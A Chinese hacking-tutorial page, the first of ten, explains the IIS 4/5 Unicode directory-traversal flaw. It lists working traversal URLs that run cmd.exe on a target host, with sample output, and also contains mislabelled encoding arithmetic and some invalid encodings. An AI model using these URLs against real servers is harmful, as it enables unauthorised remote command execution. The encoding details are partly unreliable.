UNICODE漏洞的原理

• 一、UNICODE漏洞的原理 
  此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 
  台湾繁体中文也同样存在这样的漏洞。 
  中文版的WIN2000中，UNICODE编码 存在BUG，在UNICODE 编码中 
  %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘ 
  %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\‘ 
  在NT4中/编码为%c1%9c 
  在英文版里： 
  WIN2000英文版%c0%af 
  但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，具体情况本人未做详细的证实： 
  %c1%pc 
  %c0%9v 
  %c0%qf 
  %c1%8s 
  %e0%80%af 
  %f0%80%80%af 
  %fc%80%80%80%80%af 
  或许是什么日文版、韩文版之类，win2000 Terminal版有兴趣的朋友可以试试。 
  二、UNICODE漏洞的检测 
  以下均以中文版WIN2K为例，如果是其他NT版本，按上面所述的编码替换以下代码中的%c1%1c 
  最简单的检测方法： 
  比如说有一IP地址为X.X.X.X的WIN2K主机，我们可以在地址栏输入 
  x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
  如果存在此漏洞的话，我们便可以看到以下的内容：（例子假设SCRIPTS目录里无文件） 
  Directory of C:\inetpub\scripts 
  2000-09-28 15:49 〈DIR〉 . 
  2000-09-28 15:49 〈DIR〉 .. 
  
  这是我们在很多经验交谈中常看到大家使用的方法，实际上我们也可以改为这样 
  127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir 
  即r=c 这个字母的取代，在本文发表之前，网络里没有介绍过，关于r这字母可以等效于c,我们可以通过cmd/?可以得到解释。 
  
  当然，如果目标主机的管理员把该目录删除掉，我们就无法看到了，但是还有以下的目录是同样可以用来测试的。 
  
  http://x.x.x.x/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
  运行后，我们可以看到 
  Directory of c:\program files\common files\system\msadc 
  2000-08-06 19:16 
  . 
  2000-08-06 19:16 
  .. 
  （以下内容略） 
  19 File(s) 1,233,840 bytes 
  2 Dir(s) 6,290,644,992 bytes free 
  
• [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• UNICODE漏洞的原理 相关文章：
• ·UNICODE漏洞的原理
• UNICODE漏洞的原理 相关软件

上一篇:Windows NT/2000/XP的密码恢复

下一篇:从一次渗透测试谈起

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐